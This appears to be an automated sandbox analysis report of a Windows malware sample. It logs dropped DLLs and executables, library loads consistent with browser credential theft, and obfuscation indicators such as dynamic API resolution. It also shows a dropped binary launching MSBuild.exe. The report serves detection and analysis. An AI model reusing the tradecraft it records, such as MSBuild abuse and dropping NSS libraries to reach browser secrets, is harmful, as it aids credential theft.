Source: C:\ProgramData\EHDHIDAEHC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: mscorjit.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\ProgramData\EHDHIDAEHC.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: mozglue.pdbP source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2206774883.000000006C30D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source:	Binary string: minelabfoto.pdb( source: mine[1].exe.0.dr, EHDHIDAEHC.exe.0.dr
Source:	Binary string: minelabfoto.pdb source: EHDHIDAEHC.exe, 00000004.00000000.2083490533.0000000000602000.00000002.00000001.01000000.00000009.sdmp, mine[1].exe.0.dr, EHDHIDAEHC.exe.0.dr
Source:	Binary string: PE.pdbH] source: EHDHIDAEHC.exe, 00000004.00000002.2092269679.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2097766953.00000000053B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\kfqXL.pdb source: EHDHIDAEHC.exe, 00000004.00000002.2094707680.000000000426C000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2094707680.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2098035068.0000000005634000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: softokn3.pdb@ source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2197298605.0000000047710000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2191144720.000000003B838000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.0.dr
Source:	Binary string: PE.pdb source: EHDHIDAEHC.exe, 00000004.00000002.2092269679.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2097766953.00000000053B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: nss3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source:	Binary string: mozglue.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2206774883.000000006C30D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.0.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 4.2.EHDHIDAEHC.exe.2ed93c8.1.raw.unpack, fDX9tehJ5EFemhKZwc.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 4.2.EHDHIDAEHC.exe.53b0000.13.raw.unpack, fDX9tehJ5EFemhKZwc.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 4.2.EHDHIDAEHC.exe.2ec49a0.0.raw.unpack, fDX9tehJ5EFemhKZwc.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

0_2_003E7A40

PE file contains sections with non-standard names

Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003ECDD5 push ecx; ret	0_2_003ECDE8
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2CB536 push ecx; ret	0_2_6C2CB549
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054BCBC0 pushad ; retf	4_2_054BCBD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0041CDD5 push ecx; ret	6_2_0041CDE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE11BF9 push ecx; ret	6_2_1FFB4C03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE110C8 push ecx; ret	6_2_20013552

Source: 4.2.EHDHIDAEHC.exe.2ed93c8.1.raw.unpack, fDX9tehJ5EFemhKZwc.cs	High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'NvQOxwsIFR', 'QsUuklFoHUiQD', 'MCRoDX9te', 'l5EbFemhK', 'uwcnnhQXJ', 'J3PigtLyh', 'PwdNpFGeB', 'XCj67ZIOy', 'w09DYCs5D'
Source: 4.2.EHDHIDAEHC.exe.2ed93c8.1.raw.unpack, zcrmeG4DKc05Qj8A7l.cs	High entropy of concatenated method names: 'Ys7O1WDVbX', 'EIxO3RK2jf', 'ov3OzJmFFU', 'KJS0ILfinW', 'Gtt0O5H9rf', 'Gvj00KAYqN', 'hUG0r1tocH', 'PBb0lrpBsM', 'pGy05VOh0y', 'j3M0RfBB5l'
Source: 4.2.EHDHIDAEHC.exe.53b0000.13.raw.unpack, fDX9tehJ5EFemhKZwc.cs	High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'NvQOxwsIFR', 'QsUuklFoHUiQD', 'MCRoDX9te', 'l5EbFemhK', 'uwcnnhQXJ', 'J3PigtLyh', 'PwdNpFGeB', 'XCj67ZIOy', 'w09DYCs5D'
Source: 4.2.EHDHIDAEHC.exe.53b0000.13.raw.unpack, zcrmeG4DKc05Qj8A7l.cs	High entropy of concatenated method names: 'Ys7O1WDVbX', 'EIxO3RK2jf', 'ov3OzJmFFU', 'KJS0ILfinW', 'Gtt0O5H9rf', 'Gvj00KAYqN', 'hUG0r1tocH', 'PBb0lrpBsM', 'pGy05VOh0y', 'j3M0RfBB5l'
Source: 4.2.EHDHIDAEHC.exe.2ec49a0.0.raw.unpack, fDX9tehJ5EFemhKZwc.cs	High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'NvQOxwsIFR', 'QsUuklFoHUiQD', 'MCRoDX9te', 'l5EbFemhK', 'uwcnnhQXJ', 'J3PigtLyh', 'PwdNpFGeB', 'XCj67ZIOy', 'w09DYCs5D'
Source: 4.2.EHDHIDAEHC.exe.2ec49a0.0.raw.unpack, zcrmeG4DKc05Qj8A7l.cs	High entropy of concatenated method names: 'Ys7O1WDVbX', 'EIxO3RK2jf', 'ov3OzJmFFU', 'KJS0ILfinW', 'Gtt0O5H9rf', 'Gvj00KAYqN', 'hUG0r1tocH', 'PBb0lrpBsM', 'pGy05VOh0y', 'j3M0RfBB5l'

Drops PE files

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\EHDHIDAEHC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mine[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
